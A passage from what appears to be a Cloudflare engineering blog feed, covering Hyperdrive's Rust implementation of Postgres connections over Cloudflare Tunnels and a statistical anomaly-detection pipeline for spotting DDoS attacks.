        
      </a>
    </div>
    <p>Accessing your data from anywhere in Region Earth can be hard. Traditional databases are powerful, familiar, and feature-rich, but your users can be thousands of miles away from your database. This can cause slower connection startup times, slower queries, and connection exhaustion as everything takes longer to accomplish.</p><p><a href="https://developers.cloudflare.com/workers/"><u>Cloudflare Workers</u></a> is an incredibly lightweight runtime, which enables our customers to deploy their applications globally by default and renders the <a href="https://en.wikipedia.org/wiki/Cold_start_(computing)"><u>cold start</u></a> problem almost irrelevant. The trade-off for these light, ephemeral execution contexts is the lack of persistence for things like database connections. Database connections are also notoriously expensive to spin up, with many round trips required between client and server before any query or result bytes can be exchanged.</p><p><a href="https://blog.cloudflare.com/hyperdrive-making-regional-databases-feel-distributed"><u>Hyperdrive</u></a> is designed to make the centralized databases you already have feel like they’re global while keeping connections to those databases hot. We use our <a href="https://www.cloudflare.com/network/"><u>global network</u></a> to get faster routes to your database, keep connection pools primed, and cache your most frequently run queries as close to users as possible.</p>
    <div>
      <h2>Why a Tunnel?</h2>
      <a href="#why-a-tunnel">
        
      </a>
    </div>
    <p>For something as sensitive as your database, exposing access to the public Internet can be uncomfortable. It is common to instead host your database on a private network, and allowlist known-safe IP addresses or configure <a href="https://www.cloudflare.com/learning/network-layer/what-is-gre-tunneling/"><u>GRE tunnels</u></a> to permit traffic to it. This is complex, toilsome, and error-prone. </p><p>On Cloudflare’s <a href="https://www.cloudflare.com/en-gb/developer-platform/"><u>Developer Platform</u></a>, we strive for simplicity and ease-of-use. We cannot expect all of our customers to be experts in configuring networking solutions, and so we went in search of a simpler solution. <a href="https://www.cloudflare.com/the-net/top-of-mind-security/customer-zero/"><u>Being your own customer</u></a> is rarely a bad choice, and it so happens that Cloudflare offers an excellent option for this scenario: Tunnels.</p><p><a href="https://www.cloudflare.com/products/tunnel/"><u>Cloudflare Tunnel</u></a> is a Zero Trust product that creates a secure connection between your private network and Cloudflare. Exposing services within your private network can be as simple as <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/downloads/"><u>running a </u><code><u>cloudflared</u></code><u> binary</u></a>, or deploying a Docker container running the <a href="https://hub.docker.com/r/cloudflare/cloudflared"><code><u>cloudflared</u></code><u> image we distribute</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3182f43rbwdH9krF1xhdlC/d22430cdb1efa134031f94fea691c36e/image1.png" />
          </figure>
    <div>
      <h2>A custom handler and generic streams</h2>
      <a href="#a-custom-handler-and-generic-streams">
        
      </a>
    </div>
    <p>Integrating with Tunnels to support sending Postgres directly through them was a bit of a new challenge for us. Most of the time, when we use Tunnels internally (more on that later!), we rely on the excellent job <code>cloudflared</code> does of handling all of the mechanics, and we just treat them as pipes. That wouldn’t work for Hyperdrive, though, so we had to dig into how Tunnels actually ingress traffic to build a solution.</p><p>Hyperdrive handles Postgres traffic using an entirely custom implementation of the <a href="https://www.postgresql.org/docs/current/protocol.html"><u>Postgres message protocol</u></a>. This is necessary, because we sometimes have to <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive"><u>alter the specific type or content</u></a> of messages sent from client to server, or vice versa. Handling individual bytes gives us the flexibility to implement whatever logic any new feature might need.</p><p>An additional, perhaps less obvious, benefit of handling Postgres message traffic as just bytes is that we are not bound to the transport layer choices of some <a href="https://en.wikipedia.org/wiki/Object%E2%80%93relational_mapping"><u>ORM</u></a> or library. One of the nuances of running services in Cloudflare is that we may want to egress traffic over different services or protocols, for a variety of different reasons. In this case, being able to egress traffic via a Tunnel would be pretty challenging if we were stuck with whatever raw TCP socket a library had established for us.</p><p>The way we accomplish this relies on a mainstay of Rust: <a href="https://doc.rust-lang.org/book/ch10-02-traits.html"><u>traits</u></a> (which are how Rust lets developers apply logic across generic functions and types). In the Rust ecosystem, there are two traits that define the behavior Hyperdrive wants out of its transport layers: <a href="https://docs.rs/tokio/latest/tokio/io/trait.AsyncRead.html"><code><u>AsyncRead</u></code></a> and <a href="https://docs.rs/tokio/latest/tokio/io/trait.AsyncWrite.html"><code><u>AsyncWrite</u></code></a>. There are a couple of others we also need, but we’re going to focus on just these two. These traits enable us to code our entire custom handler against a generic stream of data, without the handler needing to know anything about the underlying protocol used to implement the stream. So, we can pass around a WebSocket connection as a generic I/O stream, wherever it might be needed.</p><p>As an example, the code to create a generic TCP stream and send a Postgres startup message across it might look like this:</p>
            <pre><code>/// Send a startup message to a Postgres server, in the role of a PG client.
/// https://www.postgresql.org/docs/current/protocol-message-formats.html#PROTOCOL-MESSAGE-FORMATS-STARTUPMESSAGE
pub async fn send_startup&lt;S&gt;(stream: &amp;mut S, user_name: &amp;str, db_name: &amp;str, app_name: &amp;str) -&gt; Result&lt;(), ConnectionError&gt;
where
    S: AsyncWrite + Unpin,
{
    let protocol_number = 196608 as i32;
    let user_str = &amp;b"user\0"[..];
    let user_bytes = user_name.as_bytes();
    let db_str = &amp;b"database\0"[..];
    let db_bytes = db_name.as_bytes();
    let app_str = &amp;b"application_name\0"[..];
    let app_bytes = app_name.as_bytes();
    let len = 4 + 4
        + user_str.len() + user_bytes.len() + 1
        + db_str.len() + db_bytes.len() + 1
        + app_str.len() + app_bytes.len() + 1 + 1;

    // Construct a BytesMut of our startup message, then send it
    let mut startup_message = BytesMut::with_capacity(len as usize);
    startup_message.put_i32(len as i32);
    startup_message.put_i32(protocol_number);
    startup_message.put(user_str);
    startup_message.put_slice(user_bytes);
    startup_message.put_u8(0);
    startup_message.put(db_str);
    startup_message.put_slice(db_bytes);
    startup_message.put_u8(0);
    startup_message.put(app_str);
    startup_message.put_slice(app_bytes);
    startup_message.put_u8(0);
    startup_message.put_u8(0);

    match stream.write_all(&amp;startup_message).await {
        Ok(_) =&gt; Ok(()),
        Err(err) =&gt; {
            error!("Error writing startup to server: {}", err.to_string());
            ConnectionError::InternalError
        }
    }
}

/// Connect to a TCP socket
let stream = match TcpStream::connect(("localhost", 5432)).await {
    Ok(s) =&gt; s,
    Err(err) =&gt; {
        error!("Error connecting to address: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let _ = send_startup(&amp;mut stream, "db_user", "my_db").await;</code></pre>
            <p>With this approach, if we wanted to encrypt the stream using <a href="https://www.cloudflare.com/learning/ssl/transport-layer-security-tls/#:~:text=Transport%20Layer%20Security%2C%20or%20TLS,web%20browsers%20loading%20a%20website."><u>TLS</u></a> before we write to it (upgrading our existing <code>TcpStream</code> connection in-place, to an <code>SslStream</code>), we would only have to change the code we use to create the stream, while generating and sending the traffic would remain unchanged. This is because <code>SslStream</code> also implements <code>AsyncWrite</code>!</p>
            <pre><code>/// We're handwaving the SSL setup here. You're welcome.
let conn_config = new_tls_client_config()?;

/// Encrypt the TcpStream, returning an SslStream
let ssl_stream = match tokio_boring::connect(conn_config, domain, stream).await {
    Ok(s) =&gt; s,
    Err(err) =&gt; {
        error!("Error during websocket TLS handshake: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let _ = send_startup(&amp;mut ssl_stream, "db_user", "my_db").await;</code></pre>
            
    <div>
      <h2>Whence WebSocket</h2>
      <a href="#whence-websocket">
        
      </a>
    </div>
    <p><a href="https://datatracker.ietf.org/doc/html/rfc6455"><u>WebSocket</u></a> is an application layer protocol that enables bidirectional communication between a client and server. Typically, to establish a WebSocket connection, a client initiates an HTTP request and indicates they wish to upgrade the connection to WebSocket via the “Upgrade” header. Then, once the client and server complete the handshake, both parties can send messages over the connection until one of them terminates it.</p><p>Now, it turns out that the way Cloudflare Tunnels work under the hood is that both ends of the tunnel want to speak WebSocket, and rely on a translation layer to convert all traffic to or from WebSocket. The <code>cloudflared</code> daemon you spin up within your private network handles this for us! For Hyperdrive, however, we did not have a suitable translation layer to send Postgres messages across WebSocket, and had to write one.</p><p>One of the (many) fantastic things about Rust traits is that the contract they present is very clear. To be <code>AsyncRead</code>, you just need to implement <code>poll_read</code>. To be <code>AsyncWrite</code>, you need to implement only three functions (<code>poll_write</code>, <code>poll_flush</code>, and <code>poll_shutdown</code>). Further, there is excellent support for WebSocket in Rust built on top of the <a href="https://github.com/snapview/tungstenite-rs"><u>tungstenite-rs library</u></a>.</p><p>Thus, building our custom WebSocket stream such that it can share the same machinery as all our other generic streams just means translating the existing WebSocket support into these poll functions. There are some existing OSS projects that do this, but for multiple reasons we could not use the existing options. The primary reason is that Hyperdrive operates across multiple threads (thanks to the <a href="https://docs.rs/tokio/latest/tokio/runtime/index.html"><u>tokio runtime</u></a>), and so we rely on our connections to also handle <a href="https://doc.rust-lang.org/std/marker/trait.Send.html"><code><u>Send</u></code></a>, <a href="https://doc.rust-lang.org/std/marker/trait.Sync.html"><code><u>Sync</u></code></a>, and <a href="https://doc.rust-lang.org/std/marker/trait.Unpin.html"><code><u>Unpin</u></code></a>. None of the available solutions had all five traits handled. It turns out that most of them went with the paradigm of <a href="https://docs.rs/futures/latest/futures/sink/trait.Sink.html"><code><u>Sink</u></code></a> and <a href="https://docs.rs/futures/latest/futures/stream/trait.Stream.html"><code><u>Stream</u></code></a>, which provide a solid base from which to translate to <code>AsyncRead</code> and <code>AsyncWrite</code>. In fact some of the functions overlap, and can be passed through almost unchanged. For example, <code>poll_flush</code> and <code>poll_shutdown</code> have 1-to-1 analogs, and require almost no engineering effort to convert from <code>Sink</code> to <code>AsyncWrite</code>.</p>
            <pre><code>/// We use this struct to implement the traits we need on top of a WebSocketStream
pub struct HyperSocket&lt;S&gt;
where
    S: AsyncRead + AsyncWrite + Send + Sync + Unpin,
{
    inner: WebSocketStream&lt;S&gt;,
    read_state: Option&lt;ReadState&gt;,
    write_err: Option&lt;Error&gt;,
}

impl&lt;S&gt; AsyncWrite for HyperSocket&lt;S&gt;
where
    S: AsyncRead + AsyncWrite + Send + Sync + Unpin,
{
    fn poll_flush(mut self: Pin&lt;&amp;mut Self&gt;, cx: &amp;mut Context&lt;'_&gt;) -&gt; Poll&lt;io::Result&lt;()&gt;&gt; {
        match ready!(Pin::new(&amp;mut self.inner).poll_flush(cx)) {
            Ok(_) =&gt; Poll::Ready(Ok(())),
            Err(err) =&gt; Poll::Ready(Err(Error::new(ErrorKind::Other, err))),
        }
    }

    fn poll_shutdown(mut self: Pin&lt;&amp;mut Self&gt;, cx: &amp;mut Context&lt;'_&gt;) -&gt; Poll&lt;io::Result&lt;()&gt;&gt; {
        match ready!(Pin::new(&amp;mut self.inner).poll_close(cx)) {
            Ok(_) =&gt; Poll::Ready(Ok(())),
            Err(err) =&gt; Poll::Ready(Err(Error::new(ErrorKind::Other, err))),
        }
    }
}
</code></pre>
            <p>With that translation done, we can use an existing WebSocket library to upgrade our <code>SslStream</code> connection to a Cloudflare Tunnel, and wrap the result in our <code>AsyncRead/AsyncWrite</code> implementation. The result can then be used anywhere that our other transport streams would work, without any changes needed to the rest of our codebase! </p><p>That would look something like this:</p>
            <pre><code>let websocket = match tokio_tungstenite::client_async(request, ssl_stream).await {
    Ok(ws) =&gt; Ok(ws),
    Err(err) =&gt; {
        error!("Error during websocket conn setup: {}", err.to_string());
        return ConnectionError::InternalError;
    }
};
let websocket_stream = HyperSocket::new(websocket));
let _ = send_startup(&amp;mut websocket_stream, "db_user", "my_db").await;</code></pre>
            
    <div>
      <h2>Access granted</h2>
      <a href="#access-granted">
        
      </a>
    </div>
    <p>An observant reader might have noticed that in the code example above we snuck in a variable named request that we passed in when upgrading from an <code>SslStream to a WebSocketStream</code>. This is for multiple reasons. The first reason is that Tunnels are assigned a hostname and use this hostname for routing. The second and more interesting reason is that (as mentioned above) when negotiating an upgrade from HTTP to WebSocket, a request must be sent to the server hosting the ingress side of the Tunnel to <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Protocol_upgrade_mechanism"><u>perform the upgrade</u></a>. This is pretty universal, but we also add in an extra piece here.</p><p>At Cloudflare, we believe that <a href="https://blog.cloudflare.com/secure-by-default-understanding-new-cisa-guide/"><u>secure defaults</u></a> and <a href="https://www.cloudflare.com/learning/security/glossary/what-is-defense-in-depth/"><u>defense in depth</u></a> are the correct ways to build a better Internet. This is why traffic across Tunnels is encrypted, for example. However, that does not necessarily prevent unwanted traffic from being sent into your Tunnel, and therefore egressing out to your database. While Postgres offers a robust set of <a href="https://www.postgresql.org/docs/current/user-manag.html"><u>access control</u></a> options for protecting your database, wouldn’t it be best if unwanted traffic never got into your private network in the first place? </p><p>To that end, all <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database/"><u>Tunnels set up for use with Hyperdrive</u></a> should have a <a href="https://developers.cloudflare.com/cloudflare-one/applications/"><u>Zero Trust Access Application</u></a> configured to protect them. These applications should use a <a href="https://developers.cloudflare.com/cloudflare-one/identity/service-tokens/"><u>Service Token</u></a> to authorize connections. When setting up a new Hyperdrive, you have the option to provide the token’s ID and Secret, which will be encrypted and stored alongside the rest of your configuration. These will be presented as part of the WebSocket upgrade request to authorize the connection, allowing your database traffic through while preventing unwanted access.</p><p>This can be done within the request’s headers, and might look something like this:</p>
            <pre><code>let ws_url = format!("wss://{}", host);
let mut request = match ws_url.into_client_request() {
    Ok(req) =&gt; req,
    Err(err) =&gt; {
        error!(
            "Hostname {} could not be parsed into a valid request URL: {}", 
            host,
            err.to_string()
        );
        return ConnectionError::InternalError;
    }
};
request.headers_mut().insert(
    "CF-Access-Client-Id",
    http::header::HeaderValue::from_str(&amp;client_id).unwrap(),
);
request.headers_mut().insert(
    "CF-Access-Client-Secret",
    http::header::HeaderValue::from_str(&amp;client_secret).unwrap(),
);
</code></pre>
            
    <div>
      <h2>Building for customer zero</h2>
      <a href="#building-for-customer-zero">
        
      </a>
    </div>
    <p>If you’ve been reading the blog for a long time, some of this might sound a bit familiar.  This isn’t the first time that we’ve <a href="https://blog.cloudflare.com/cloudflare-tunnel-for-postgres/"><u>sent Postgres traffic across a tunnel</u></a>, it’s something most of us do from our laptops regularly.  This works very well for interactive use cases with low traffic volume and a high tolerance for latency, but historically most of our products have not been able to employ the same approach.</p><p>Cloudflare operates <a href="https://www.cloudflare.com/network/"><u>many data centers</u></a> around the world, and most services run in every one of those data centers. There are some tasks, however, that make the most sense to run in a more centralized fashion. These include tasks such as managing control plane operations, or storing configuration state.  Nearly every Cloudflare product houses its control plane information in <a href="https://blog.cloudflare.com/performance-isolation-in-a-multi-tenant-database-environment/"><u>Postgres clusters</u></a> run centrally in a handful of our data centers, and we use a variety of approaches for accessing that centralized data from elsewhere in our network. For example, many services currently use a push-based model to publish updates to <a href="https://blog.cloudflare.com/moving-quicksilver-into-production/"><u>Quicksilver</u></a>, and work through the complexities implied by such a model. This has been a recurring challenge for any team looking to build a new product.</p><p>Hyperdrive’s entire reason for being is to make it easy to access such central databases from our global network. When we began exploring Tunnel integrations as a feature, many internal teams spoke up immediately and strongly suggested they’d be interested in using it themselves. This was an excellent opportunity for Cloudflare to scratch its own itch, while also getting a lot of traffic on a new feature before releasing it directly to the public. As always, being “customer zero” means that we get fast feedback, more reliability over time, stronger connections between teams, and an overall better suite of products. We jumped at the chance.</p><p>As we rolled out early versions of Tunnel integration, we worked closely with internal teams to get them access to it, and fixed any rough spots they encountered. We’re pleased to share that this first batch of teams have found great success building new or <a href="https://www.cloudflare.com/learning/cloud/how-to-refactor-applications/">refactored</a> products on Hyperdrive over Tunnels. For example: if you’ve already tried out <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#continuous-integration-and-delivery"><u>Workers Builds</u></a>, or recently <a href="https://www.cloudflare.com/trust-hub/reporting-abuse/"><u>submitted an abuse report</u></a>, you’re among our first users!  At the time of this writing, we have several more internal teams working to onboard, and we on the Hyperdrive team are very excited to see all the different ways in which fast and simple connections from Workers to a centralized database can help Cloudflare just as much as they’ve been helping our external customers.</p>
    <div>
      <h2>Outro</h2>
      <a href="#outro">
        
      </a>
    </div>
    <p>Cloudflare is on a mission to make the Internet faster, safer, and more reliable. Hyperdrive was built to make connecting to centralized databases from the Workers runtime as quick and consistent as possible, and this latest development is designed to help all those who want to use Hyperdrive without directly exposing resources within their virtual private clouds (VPCs) on the public web.</p><p>To this end, we chose to build a solution around our suite of industry-leading <a href="https://developers.cloudflare.com/cloudflare-one/"><u>Zero Trust</u></a> tools, and were delighted to find how simple it was to implement in our runtime given the power and extensibility of the Rust <code>trait</code> system. </p><p>Without waiting for the ink to dry, multiple teams within Cloudflare have adopted this new feature to quickly and easily solve what have historically been complex challenges, and are happily operating it in production today.</p><p>And now, if you haven't already, try <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database/"><u>setting up Hyperdrive across a Tunnel</u></a>, and let us know what you think in the <a href="https://discord.com/channels/595317990191398933/1150557986239021106"><u>Hyperdrive Discord channel</u></a>!</p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Hyperdrive]]></category>
            <category><![CDATA[Postgres]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[WebSockets]]></category>
            <guid isPermaLink="false">5GK429XQHhFzVyKSXGZ2R6</guid>
            <dc:creator>Andrew Repp</dc:creator>
            <dc:creator>Emilio Assunção</dc:creator>
            <dc:creator>Abhishek Chanda</dc:creator>
        </item>
        <item>
            <title><![CDATA[Training a million models per day to save customers of all sizes from DDoS attacks]]></title>
            <link>https://blog.cloudflare.com/training-a-million-models-per-day-to-save-customers-of-all-sizes-from-ddos/</link>
            <pubDate>Wed, 23 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ In this post we will describe how we use anomaly detection to watch for novel DDoS attacks. We’ll provide an overview of how we build models which flag unusual traffic and keep our customers safe. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Our always-on DDoS protection runs inside every server across our global network.  It constantly analyzes incoming traffic, looking for signals associated with previously identified DDoS attacks. We dynamically create <a href="https://developers.cloudflare.com/ddos-protection/about/how-ddos-protection-works/"><u>fingerprints</u></a> to flag malicious traffic, which is dropped when detected in high enough volume — so it never reaches its destination — keeping customer websites online.</p><p>In many cases, flagging bad traffic can be straightforward. For example, if we see too many requests to a destination with the same protocol violation, we can be fairly sure this is an automated script, rather than a surge of requests from a legitimate web browser.</p><p>Our DDoS systems are great at detecting attacks, but there’s a minor catch. Much like the human immune system, they are great at spotting attacks similar to things they have seen before. But for new and novel threats, they need a little help knowing what to look for, which is an expensive and time-consuming human endeavor.</p><p>Cloudflare protects millions of Internet properties, and we serve over 60 million HTTP requests per second on average, so trying to find unmitigated attacks in such a huge volume of traffic is a daunting task. In order to protect the smallest of companies, we need a way to find unmitigated attacks that may only be a few thousand requests per second, as even these can be enough to take smaller sites offline.</p><p>To better protect our customers, we also have a system to automatically identify unmitigated, or partially mitigated DDoS attacks, so we can better shore up our defenses against emerging threats. In this post we will introduce this anomaly detection pipeline, we’ll provide an overview of how it builds statistical models which flag unusual traffic and keep our customers safe. Let’s jump in!</p>
    <div>
      <h2>A naive volumetric model</h2>
      <a href="#a-naive-volumetric-model">
        
      </a>
    </div>
    <p>A DDoS attack, by definition, is characterized by a higher than normal volume of traffic destined for a particular destination. We can use this fact to loosely sketch out a potential approach. Let’s look at an example website, and look at the request volume over the course of a day, broken down into 1 minute intervals.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6j97IMawigCOtQEIKLzQ4n/8ab1e487a5dc8faaecc732b8fbb7d8d4/image3.png" />
          </figure><p>We can plot this same data as a histogram:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Ys3wf2GY6e5K4rEBUTDBN/5cff86a1f90ee5e0eae9ec394f2322b3/image6.png" />
          </figure><p>The data follows a bell-shaped curve, also known as a normal distribution. We can use this fact to flag observations which appear outside the usual range. By first calculating the mean and standard deviation of our dataset, we can then use these values to rate new observations by calculating how many standard deviations (or sigma) the data is from the mean.</p><p>This value is also called the z-score — a z-score of 3 is the same as 3-sigma, which corresponds to 3 standard deviations from the mean. A data point with a high enough z-score is sufficiently unusual that it might signal an attack. Since the mean and standard deviation are stationary, we can calculate a request volume threshold for each z-score value, and use traffic volumes above these thresholds to signal an ongoing attack.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4X5WaA5QssNRlWWaz4UUYL/05b88c9cfe52f6ba05cef7cab033d53d/image1.png" />
          </figure><p><sup><i>Trigger thresholds for z-score of 3, 4 and 5</i></sup></p><p>Unfortunately, it’s incredibly rare to see traffic that is this uniform in practice, as user load will naturally vary over a day. Here I’ve simulated some traffic for a website which runs a meal delivery service, and as you might expect it has big peaks around meal times, and low traffic overnight since it only operates in a single country.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Pk6sFmz8lqjUJrdTev8Xw/194436196eddbbb11576b74f1515d6c6/image2.png" />
          </figure><p>Our volume data no longer follows a normal distribution and our 3-sigma threshold is now much further away, so smaller attacks could pass undetected.</p><p>Many websites elastically scale their underlying hardware based upon anticipated load to save on costs. In the example above the website operator would run far fewer servers overnight, when the anticipated load is low, to save on running costs. This makes the website more vulnerable to attacks during off-peak hours as there would be less hardware to absorb them. An attack as low as a few hundred requests per minute may be enough to overwhelm the site early in the morning, even though the peak-time infrastructure could easily absorb this volume.</p><p>This approach relies on traffic volume being stable over time, meaning it’s roughly flat throughout the day, but this is rarely true in practice. Even when it is true, benign increases in traffic are common, such as an e-commerce site running a Black Friday sale. In this situation, a website would expect a surge in traffic that our model wouldn’t anticipate, and we may incorrectly flag real shoppers as attackers.</p><p>It turns out this approach makes too many naive assumptions about what traffic should look like, so it’s impossible to choose an appropriate sigma threshold which works well for all customers.</p>
    <div>
      <h2>Time series forecasting</h2>
      <a href="#time-series-forecasting">
        
      </a>
    </div>
    <p>Let’s continue with trying to determine a volumetric baseline for our meal delivery example. A reasonable assumption we could add is that yesterday’s traffic shape should approximate the expected shape of traffic today. This idea is called “seasonality”. Weekly seasonality is also pretty common, i.e. websites see more or less traffic on certain weekdays or on weekends.</p><p>There are many methods designed to analyze a dataset, unpick the varying horizons of seasonality within it, and then build an appropriate predictive model. We won’t go into them here but reading about <a href="https://en.wikipedia.org/wiki/Autoregressive_integrated_moving_average"><u>Seasonal ARIMA (SARIMA)</u></a> is a good place to start if you are looking for further information.</p><p>There are three main challenges that make SARIMA methods unsuitable for our purposes. First is that in order to get a good idea of seasonality, you need a lot of data. To predict weekly seasonality, you need at least a few weeks worth of data. We’d require a massive dataset to predict monthly, or even annual, patterns (such as Black Friday). This means new customers wouldn’t be protected until they’d been with us for multiple years, so this isn’t a particularly practical approach.</p><p>The second issue is the cost of training models. In order to maintain good accuracy, time series models need to be frequently retrained. The exact frequency varies between methods, but in the worst cases, a model is only good for 2–3 inferences, meaning we’d need to retrain all our models every 10–20 minutes. This is feasible, but it’s incredibly wasteful.</p><p>The third hurdle is the hardest to work around, and is the reason why a purely volumetric model doesn’t work. Most websites experience completely benign spikes in traffic that lie outside prior norms. Flash sales are one such example, or 1,000,000 visitors driven to a site from Reddit, or a Super Bowl commercial.</p>
    <div>
      <h2>A better way?</h2>
      <a href="#a-better-way">
        
      </a>
    </div>
    <p>So if volumetric modeling won’t work, what can we do instead? Fortunately, volume isn’t the only axis we can use to measure traffic. Consider the end users’ browsers for example. It would be reasonable to assume that over a given time interval, the proportion of users across the top 5 browsers would remain reasonably stationary, or at least within a predictable range. More importantly, this proportion is unlikely to change too much during benign traffic surges.</p><p>Through careful analysis we were able to discover about a dozen such variables with the following features for a given zone: </p><ul><li><p>They follow a normal distribution</p></li><li><p>They aren’t correlated, or are only loosely correlated with volume</p></li><li><p>They deviate from the underlying normal distribution during “under attack” events</p></li></ul><p>Recall our initial volume model, where we used z-score to define a cutoff. We can expand this same idea to multiple dimensions. We have a dozen different time series (each feature is a single time series), which we can imagine as a cloud of points in 12 dimensions. Here is a sample showing 3 such features, with each point representing the traffic readings at a different point in time. Note that both graphs show the same cloud of points from two different angles.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5idkNYYgL0IhY8d2HapYud/f3696ec7fb91f8641a04ba261d0cf673/image4.png" />
          </figure><p>To use our z-score analogy from before, we’d want our points to be spherical, since our multidimensional- z-score is then just the distance from the centre of the cloud. We could then use this distance to define a cutoff threshold for attacks.</p><p>For several reasons, a perfect sphere is unlikely in practice. Our various features measure different things, so they have very different scales of ‘normal’. One property might vary between 100-300 whereas another property might usually occupy the interval 0-1. A change of 3 in this latter property would be a significant anomaly, whereas in the first this would just be within the normal range.</p><p>More subtly, two or more axes may be correlated, so an increase in one is usually mirrored with a proportional increase/decrease in another dimension. This turns our sphere into an off-axis disc shape, as pictured above.</p><p>Fortunately, we have a couple of mathematical tricks up our sleeve. The first is scale normalization. In each of our n dimensions, we subtract the mean, and divide by the standard deviation. This makes all our dimensions the same size and centres them around zero. This gives a multidimensional analogue of z-score, but it won’t fix the disc shape.</p><p>What we can do is figure out the orientation and dimensions of the disc, and for this we use a tool called <a href="https://en.wikipedia.org/wiki/Principal_component_analysis"><u>Principal Component Analysis (PCA)</u></a>. This lets us reorient our disc, and rescale the axes according to their size, to make them all the same.</p><p>Imagine grabbing the disc out of the air, then drawing new X and Y axes on the top surface, with the origin at the center of the disc. Our new Z-axis is the thickness of the disc. We can compare the thickness to the diameter of the disc, to give us a scaling factor for the Z direction. Imagine stretching the disc along the z-axis until it’s as tall as the length across the diameter.</p><p>In reality there’s nothing to say that X &amp; Y have to be the same size either, but hopefully you get the general idea. PCA lets us draw new axes along these lines of correlation in an arbitrary number of dimensions, and convert our n-dimensional disc into a nicely behaved sphere of points (technically an n-dimensional sphere).</p><p>Having done all this work, we can uniquely define a coordinate transformation which takes any measurement from our raw features, and tells us where it should lie in the sphere, and since all our dimensions are the same size we can generate an anomaly score purely based on its distance from the centre of the cloud.</p><p>As a final trick, we can also use a final scaling operation to ensure the sphere for dataset A is the same size as the sphere generated from dataset B, meaning we can do this same process for any traffic data and define a cutoff distance λ which is the same across all our models. Rather than fine-tuning models for each individual customer zone, we can tune this to a value which applies globally.</p><p>Another name for this measurement is <a href="https://en.wikipedia.org/wiki/Mahalanobis_distance"><u>Mahalanobis distance</u></a>. (Inclined readers can understand this equivalence by considering the role of the covariance matrix in PCA and Mahalanobis distance. Further discussion can be found on <a href="https://stats.stackexchange.com/questions/166525/is-mahalanobis-distance-equivalent-to-the-euclidean-one-on-the-pca-rotated-data"><u>this</u></a> StackExchange post.) We further tune the process to discard dimensions with little variance — if our disc is too thin we discard the thickness dimension.  In practice, such dimensions were too sensitive to be useful.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OcPc7zoehsizwzPEkD1Fc/094bd59ca6d6aba3c301fd74f12d580a/image5.png" />
          </figure><p>We’re left with a multidimensional analogue of the z-score we started with, but this time our variables aren’t correlated with peacetime traffic volume. Above we show 2 output dimensions, with coloured circles which show Mahalanobis distances of 4, 5 and 6. Anything outside the green circle will be classified as an attack.</p>
    <div>
      <h2>How we train ~1 million models daily to keep customers safe</h2>
      <a href="#how-we-train-1-million-models-daily-to-keep-customers-safe">
        
      </a>
    </div>
    <p>The approach we’ve outlined is incredibly parallelizable: a single model requires only the traffic data for that one website, and the datasets needed can be quite small. We use 4 weeks of training data chunked into 5 minute intervals which is only ~8k rows/website.</p><p>We run all our training and inference in an Apache Airflow deployment in Kubernetes. Due to the parallelizability, we can scale horizontally as needed. On average, we can train about 3 models/second/thread. We currently retrain models every day, but we’ve observed very little intraday model drift (i.e. yesterday’s model is the same as today’s), so training frequency may be reduced in the future.</p><p>We don’t consider it necessary to build models for all our customers, instead we train models for a large sample of representative customers, including a large number on the Free plan. The goal is to identify attacks for further study which we then use to tune our existing DDoS systems for all customers.</p>
    <div>
      <h2>Join us!</h2>
      <a href="#join-us">
        
      </a>
    </div>
    <p>If you’ve read this far you may have questions, like “how do you filter attacks from your training data?” or you may have spotted a handful of other technical details which I’ve elided to keep this post accessible to a general audience. If so, you would fit in well here at Cloudflare. We’re helping to build a better Internet, and we’re <a href="https://www.cloudflare.com/careers/jobs/?title=data+scientist"><u>hiring</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <guid isPermaLink="false">4awe2vvz8flXFLuz3BGm7j</guid>
            <dc:creator>Nick Wood</dc:creator>
            <dc:creator>Manish Arora</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building Vectorize, a distributed vector database, on Cloudflare’s Developer Platform]]></title>
            <link>https://blog.cloudflare.com/building-vectorize-a-distributed-vector-database-on-cloudflare-developer-platform/</link>
            <pubDate>Tue, 22 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare's Vectorize is now generally available, offering faster responses, lower pricing, a free tier, and supporting up to 5 million vectors. ]]></description>
